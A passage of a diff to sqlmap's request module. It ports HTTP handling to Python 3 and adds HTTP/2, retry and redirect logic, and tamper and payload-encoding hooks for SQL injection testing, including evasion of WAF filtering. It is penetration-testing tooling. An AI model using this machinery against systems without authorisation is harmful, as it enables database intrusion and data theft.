kb.pageEncoding) + page = "\n".join(_page) - if method: - req = MethodRequest(url, post, headers) - req.set_method(method) - else: - req = urllib2.Request(url, post, headers) + ws.close() + code = ws.status + status = _http_client.responses[code] - requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) + class _(dict): + pass - if not getRequestHeader(req, HTTPHEADER.COOKIE) and conf.cj: - conf.cj._policy._now = conf.cj._now = int(time.time()) - cookies = conf.cj._cookies_for_request(req) - requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) + responseHeaders = _(ws.getheaders()) + responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - if post is not None: - if not getRequestHeader(req, HTTPHEADER.CONTENT_LENGTH): - requestHeaders += "\n%s: %d" % (string.capwords(HTTPHEADER.CONTENT_LENGTH), len(post)) + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in responseHeaders.items()]) + requestMsg += "\r\n%s" % requestHeaders - if not getRequestHeader(req, HTTPHEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) - requestMsg += "\n%s" % requestHeaders + requestMsg += "\r\n" - if post is not None: - requestMsg += "\n\n%s" % getUnicode(post) + threadData.lastRequestMsg = requestMsg - requestMsg += "\n" + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + else: + post = getBytes(post) - threadData.lastRequestMsg = requestMsg + if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if kb.place != HTTPMETHOD.POST: + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + else: + post = urldecode(post, convall=True) + post = encodeBase64(post) + + if target and cmdLineOptions.method or method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): + req = MethodRequest(url, post, headers) + req.set_method(cmdLineOptions.method or method) + elif url is not None: + req = _urllib.request.Request(url, post, headers) + else: + return None, None, None - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + for function in kb.preprocessFunctions: + try: + function(req) + except Exception as ex: + errMsg = "error occurred while running preprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + else: + post, headers = req.data, req.headers - conn = urllib2.urlopen(req) + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in req.header_items()]) - if not kb.authHeader and getRequestHeader(req, HTTPHEADER.AUTHORIZATION): - kb.authHeader = getRequestHeader(req, HTTPHEADER.AUTHORIZATION) + if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: + conf.cj._policy._now = conf.cj._now = int(time.time()) + with conf.cj._cookies_lock: + cookies = conf.cj._cookies_for_request(req) + requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) - if not kb.proxyAuthHeader and getRequestHeader(req, HTTPHEADER.PROXY_AUTHORIZATION): - kb.proxyAuthHeader = getRequestHeader(req, HTTPHEADER.PROXY_AUTHORIZATION) + if post is not None: + if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH) and not chunked: + requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) - # Return response object - if response: - return conn, None, None + if not getRequestHeader(req, HTTP_HEADER.CONNECTION): + requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive") - # Get HTTP response - if hasattr(conn, 'redurl'): - page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn) - skipLogTraffic = kb.redirectChoice == REDIRECTION.NO - code = conn.redcode - else: - page = Connect._connReadProxy(conn) + requestMsg += "\r\n%s" % requestHeaders - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) - if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - url = extractRegexResult(META_REFRESH_REGEX, page) + if not chunked: + requestMsg += "\r\n" - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + else: + for char in (r"\r", r"\n"): + cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") + if conf.http2: + try: + import httpx + except ImportError: + raise SqlmapMissingDependence("httpx[http2] not available (e.g. 'pip%s install httpx[http2]')" % ('3' if six.PY3 else "")) - kb.alwaysRefresh = choice not in ("n", "N") + if LooseVersion(httpx.__version__) < LooseVersion(MIN_HTTPX_VERSION): + raise SqlmapMissingDependence("outdated version of httpx detected (%s<%s)" % (httpx.__version__, MIN_HTTPX_VERSION)) - if kb.alwaysRefresh: - if url.lower().startswith('http://'): - kwargs['url'] = url + try: + proxy_mounts = dict(("%s://" % key, httpx.HTTPTransport(proxy="%s%s" % ("http://" if "://" not in kb.proxies[key] else "", kb.proxies[key]))) for key in kb.proxies) if kb.proxies else None + with httpx.Client(verify=False, http2=True, timeout=timeout, follow_redirects=True, cookies=conf.cj, mounts=proxy_mounts) as client: + conn = client.request(method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET), url, headers=headers, data=post) + except (httpx.HTTPError, httpx.InvalidURL, httpx.CookieConflict, httpx.StreamError) as ex: + raise _http_client.HTTPException(getSafeExString(ex)) else: - kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url + conn.code = conn.status_code + conn.msg = conn.reason_phrase + conn.info = lambda c=conn: c.headers - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['get'] = None - kwargs['post'] = None + conn._read_buffer = conn.read() + conn._read_offset = 0 - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass + requestMsg = re.sub(" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1) + + if not multipart: + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + def _read(count=None): + offset = conn._read_offset + if count is None: + result = conn._read_buffer[offset:] + conn._read_offset = len(conn._read_buffer) + else: + result = conn._read_buffer[offset: offset + count] + conn._read_offset += len(result) + return result + + conn.read = _read + else: + if not multipart: + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + conn = _urllib.request.urlopen(req) + + if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): + kb.authHeader = getUnicode(getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)) + + if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): + kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) + + # Return response object + if response: + return conn, None, None + + # Get HTTP response + if hasattr(conn, "redurl"): + page = (threadData.lastRedirectMsg[1] if kb.choices.redirect == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None + skipLogTraffic = kb.choices.redirect == REDIRECTION.NO + code = conn.redcode if not finalCode else code + else: + page = Connect._connReadProxy(conn) if not skipRead else None + + if conn: + code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) + responseHeaders = conn.info() + responseHeaders[URI_HTTP_HEADER] = conn.geturl() if hasattr(conn, "geturl") else url + + if getattr(conn, "redurl", None) is not None: + responseHeaders[HTTP_HEADER.LOCATION] = conn.redurl + + responseHeaders = patchHeaders(responseHeaders) + kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader) + else: + code = None + responseHeaders = {} + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) + status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None + + kb.connErrorCounter = 0 + + if not refreshing: + refresh = responseHeaders.get(HTTP_HEADER.REFRESH, "").split("url=")[-1].strip() + + if extractRegexResult(META_REFRESH_REGEX, page): + refresh = extractRegexResult(META_REFRESH_REGEX, page) + + debugMsg = "got HTML meta refresh header" + logger.debug(debugMsg) + + if not refresh: + refresh = extractRegexResult(JAVASCRIPT_HREF_REGEX, page) + + if refresh: + debugMsg = "got Javascript redirect logic" + logger.debug(debugMsg) + + if refresh: + if kb.alwaysRefresh is None: + msg = "got a refresh intent " + msg += "(redirect like response common to login pages) to '%s'. " % refresh + msg += "Do you want to apply it from now on? [Y/n]" + + kb.alwaysRefresh = readInput(msg, default='Y', boolean=True) + + if kb.alwaysRefresh: + if re.search(r"\Ahttps?://", refresh, re.I): + url = refresh + else: + url = _urllib.parse.urljoin(url, refresh) + + threadData.lastRedirectMsg = (threadData.lastRequestUID, page) + kwargs["refreshing"] = True + kwargs["url"] = url + kwargs["get"] = None + kwargs["post"] = None + + try: + return Connect._getPageProxy(**kwargs) + except SqlmapSyntaxException: + pass # Explicit closing of connection object - if not conf.keepAlive: + if conn and not conf.keepAlive: try: - if hasattr(conn.fp, '_sock'): + if hasattr(conn, "fp") and hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occured during connection closing ('%s')" % msg - logger.warn(warnMsg) + except Exception as ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) - except urllib2.HTTPError, e: + except SqlmapConnectionException as ex: + if conf.proxyList and not kb.threadException: + warnMsg = "unable to connect to the target URL ('%s')" % getSafeExString(ex) + logger.critical(warnMsg) + threadData.retriesCount = conf.retries + return Connect._retryProxy(**kwargs) + else: + raise + + except _urllib.error.HTTPError as ex: page = None responseHeaders = None + if checking: + return None, None, None + try: - page = e.read() - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() + responseHeaders = patchHeaders(responseHeaders) + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.warn(warnMsg) + warnMsg += "to get error page information (%d)" % ex.code + logger.warning(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: - page = page if isinstance(page, unicode) else getUnicode(page) + page = getUnicode(page) - code = e.code - threadData.lastHTTPError = (threadData.lastRequestUID, code) + code = ex.code + status = getUnicode(getattr(ex, "reason", None) or getSafeExString(ex).split(": ", 1)[-1]) + kb.originalCode = kb.originalCode or code + threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + if responseHeaders and getattr(responseHeaders, "headers", None): + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - - if e.code == httplib.UNAUTHORIZED: - errMsg = "not authorized, try to provide right HTTP " - errMsg += "authentication type and valid credentials (%d)" % code - raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: - if raise404: - errMsg = "page not found (%d)" % code + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) + + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + + if code in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % code + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + if ex.code not in (conf.ignoreCode or []): + if ex.code == _http_client.UNAUTHORIZED: + errMsg = "not authorized, try to provide right HTTP " + errMsg += "authentication type and valid credentials (%d). " % code + errMsg += "If this is intended, try to rerun by providing " + errMsg += "a valid value for option '--ignore-code'" raise SqlmapConnectionException(errMsg) + elif chunked and ex.code in (_http_client.METHOD_NOT_ALLOWED, _http_client.LENGTH_REQUIRED): + warnMsg = "turning off HTTP chunked transfer encoding " + warnMsg += "as it seems that the target site doesn't support it (%d)" % code + singleTimeWarnMessage(warnMsg) + conf.chunked = kwargs["chunked"] = False + return Connect.getPage(**kwargs) + elif ex.code == _http_client.REQUEST_URI_TOO_LONG: + warnMsg = "request URI is marked as too long by the target. " + warnMsg += "you are advised to try a switch '--no-cast' and/or '--no-escape'" + singleTimeWarnMessage(warnMsg) + elif ex.code == _http_client.NOT_FOUND: + if raise404: + errMsg = "page not found (%d)" % code + raise SqlmapConnectionException(errMsg) + else: + debugMsg = "page not found (%d)" % code + singleTimeLogMessage(debugMsg, logging.DEBUG) + elif ex.code == _http_client.GATEWAY_TIMEOUT: + if ignoreTimeout: + return None if not conf.ignoreTimeouts else "", None, None + else: + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, _http_client.responses[ex.code]) + if threadData.retriesCount < conf.retries and not kb.threadException: + warnMsg += ". sqlmap is going to retry the request" + logger.critical(warnMsg) + return Connect._retryProxy(**kwargs) + elif kb.testMode: + logger.critical(warnMsg) + return None, None, None + else: + raise SqlmapConnectionException(warnMsg) else: - debugMsg = "page not found (%d)" % code + debugMsg = "got HTTP error code: %d ('%s')" % (code, status) logger.debug(debugMsg) - processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: - if ignoreTimeout: - return None, None, None - else: - warnMsg = "unable to connect to the target url (%d - %s)" % (e.code, httplib.responses[e.code]) - if threadData.retriesCount < conf.retries and not kb.threadException: - warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) - return Connect._retryProxy(**kwargs) - elif kb.testMode: - logger.critical(warnMsg) - return None, None, None - else: - raise SqlmapConnectionException(warnMsg) - else: - debugMsg = "got HTTP error code: %d (%s)" % (code, status) - logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e: + except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError, AssertionError, KeyError): tbMsg = traceback.format_exc() - if "no host given" in tbMsg: - warnMsg = "invalid url address used (%s)" % repr(url) + if conf.debug: + dataToStdout(tbMsg) + + if checking: + return None, None, None + elif "KeyError:" in tbMsg: + if "content-length" in tbMsg: + return None, None, None + else: + raise + elif "AttributeError:" in tbMsg: + if "WSAECONNREFUSED" in tbMsg: + return None, None, None + else: + raise + elif "no host given" in tbMsg: + warnMsg = "invalid URL address used (%s)" % repr(url) raise SqlmapSyntaxException(warnMsg) - elif "forcibly closed" in tbMsg: - warnMsg = "connection was forcibly closed by the target url" + elif any(_ in tbMsg for _ in ("forcibly closed", "Connection is already closed", "ConnectionAbortedError")): + warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: - warnMsg = "connection timed out to the target url" + if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection timed out to the target URL" + elif "Connection reset" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection reset(s)") + conf.disablePrecon = True + + if kb.testMode: + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: - warnMsg = "unable to connect to the target url" + warnMsg = "unable to connect to the target URL" + match = re.search(r"Errno \d+\] ([^>\n]+)", tbMsg) + if match: + warnMsg += " ('%s')" % match.group(1).strip() + elif "NTLM" in tbMsg: + warnMsg = "there has been a problem with NTLM authentication" + elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload) + return None, None, None elif "BadStatusLine" in tbMsg: warnMsg = "connection dropped or unknown HTTP " - warnMsg += "status code received. Try to force the HTTP User-Agent " - warnMsg += "header with option '--user-agent' or switch '--random-agent'" + warnMsg += "status code received" + if not conf.agent and not conf.randomAgent: + warnMsg += ". Try to force the HTTP User-Agent " + warnMsg += "header with option '--user-agent' or switch '--random-agent'" elif "IncompleteRead" in tbMsg: warnMsg = "there was an incomplete read error while retrieving data " - warnMsg += "from the target url" + warnMsg += "from the target URL" + elif "Handshake status" in tbMsg: + status = re.search(r"Handshake status ([\d]{3})", tbMsg) + errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" + raise SqlmapConnectionException(errMsg) + elif "SqlmapCompressionException" in tbMsg: + warnMsg = "problems with response (de)compression" + retrying = True else: - warnMsg = "unable to connect to the target url" + warnMsg = "unable to connect to the target URL" - if "BadStatusLine" not in tbMsg: + if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)): warnMsg += " or proxy" + if silent: + return None, None, None + + with kb.locks.connError: + kb.connErrorCounter += 1 + + if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.choices.connError is None: + message = "there seems to be a continuous problem with connection to the target. " + message += "Are you sure that you want to continue? [y/N] " + + kb.choices.connError = readInput(message, default='N', boolean=True) + + if kb.choices.connError is False: + raise SqlmapSkipTargetException + if "forcibly closed" in tbMsg: logger.critical(warnMsg) return None, None, None - elif silent or (ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead"))): - return None, None, None + elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead", "Interrupted system call")): + return None if not conf.ignoreTimeouts else "", None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" - logger.critical(warnMsg) + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) return Connect._retryProxy(**kwargs) - elif kb.testMode: + elif kb.testMode or kb.multiThreadMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) finally: - page = page if isinstance(page, unicode) else getUnicode(page) + for function in kb.postprocessFunctions: + try: + page, responseHeaders, code = function(page, responseHeaders, code) + except Exception as ex: + errMsg = "error occurred while running postprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if isinstance(page, six.binary_type): + if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): + page = six.text_type(page, errors="ignore") + else: + page = getUnicode(page) + + for _ in (getattr(conn, "redcode", None), code): + if _ is not None and _ in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % _ + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + threadData.lastPage = page + threadData.lastCode = code + socket.setdefaulttimeout(conf.timeout) - processResponse(page, responseHeaders) + # Dirty patch for Python3.11.0a7 (e.g. https://github.com/sqlmapproject/sqlmap/issues/5091) + if not sys.version.startswith("3.11."): + if conf.retryOn and re.search(conf.retryOn, page, re.I): + if threadData.retriesCount < conf.retries: + warnMsg = "forced retry of the request because of undesired page content" + logger.warning(warnMsg) + return Connect._retryProxy(**kwargs) - responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) - if responseHeaders: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + processResponse(page, responseHeaders, code, status) if not skipLogTraffic: - logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) + if conn and getattr(conn, "redurl", None): + _ = _urllib.parse.urlsplit(conn.redurl) + _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) + requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) + + if kb.resendPostOnRedirect is False: + requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg) + requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg) + requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg) - if conf.verbose <= 5: - responseMsg += getUnicode(logHeaders) - elif conf.verbose > 5: - responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, conn.code, status) + elif "\n" not in responseMsg: + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) + + if responseHeaders: + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() + + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) + + if conf.verbose <= 5: + responseMsg += getUnicode(logHeaders) + elif conf.verbose > 5: + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) return page, responseHeaders, code @staticmethod - def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): + @stackedmethod + def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False, ignoreSecondOrder=False): """ - This method calls a function to get the target url page content - and returns its page MD5 hash or a boolean value in case of - string match check ('--string' command line parameter) + This method calls a function to get the target URL page content + and returns its page ratio (0 <= ratio <= 1) or a boolean value + representing False/True match in case of !getRatioValue """ if conf.direct: @@ -578,61 +1046,113 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent pageLength = None uri = None code = None - skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET + kb.place = place + + if not auxHeaders: + auxHeaders = {} + raise404 = place != PLACE.URI if raise404 is None else raise404 + method = method or conf.method + + postUrlEncode = kb.postUrlEncode value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() - if skipUrlEncode is None and conf.httpHeaders: - headers = dict(conf.httpHeaders) - _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) - if _ and "urlencoded" not in _: - skipUrlEncode = True + if conf.httpHeaders: + headers = OrderedDict(conf.httpHeaders) + contentType = max(headers[_] or "" if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else "" for _ in headers) or None + + if (kb.postHint or conf.skipUrlEncode) and postUrlEncode: + postUrlEncode = False + if not (conf.skipUrlEncode and contentType): # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5092 + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] + contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) + conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) + if "urlencoded" in contentType: + postUrlEncode = True if payload: - if kb.tamperFunctions: + delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER) + + if not disableTampering and kb.tamperFunctions: for function in kb.tamperFunctions: - payload = function(payload=payload, headers=auxHeaders) - if not isinstance(payload, basestring): - errMsg = "tamper function '%s' returns " % function.func_name + hints = {} + + try: + payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints) + except Exception as ex: + errMsg = "error occurred while running tamper " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if not isinstance(payload, six.string_types): + errMsg = "tamper function '%s' returns " % function.__name__ errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) - logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) + if hints: + if HINT.APPEND in hints: + value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND]) + + if HINT.PREPEND in hints: + if place == PLACE.URI: + match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value) + if match: + value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0))) + else: + value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) + + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) - if place == PLACE.CUSTOM_POST: + if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts - payload = payload.replace('>', ">").replace('<', "<") + payload = payload.replace("&#", SAFE_HEX_MARKER) + payload = payload.replace('&', "&").replace('>', ">").replace('<', "<").replace('"', """).replace("'", "'") # Reference: https://stackoverflow.com/a/1091953 + payload = payload.replace(SAFE_HEX_MARKER, "&#") elif kb.postHint == POST_HINT.JSON: - if payload.startswith('"') and payload.endswith('"'): - payload = json.dumps(payload[1:-1]) - else: - payload = json.dumps(payload)[1:-1] + payload = escapeJsonValue(payload) + elif kb.postHint == POST_HINT.JSON_LIKE: + payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') + payload = escapeJsonValue(payload) + payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: - if not skipUrlEncode and place in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI): - # GET, POST, URI and Cookie payload needs to be throughly URL encoded - payload = urlencode(payload, '%', False, place != PLACE.URI) - value = agent.replacePayload(value, payload) + # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: + skip = False + + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper(): + if kb.choices.cookieEncode is None: + msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 + kb.choices.cookieEncode = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True) + if not kb.choices.cookieEncode: + skip = True + + if not skip: + if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path) + value = urlencode(value, spaceplus=kb.postSpaceToPlus) + payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus) + value = agent.replacePayload(value, payload) + postUrlEncode = False if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): + if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, 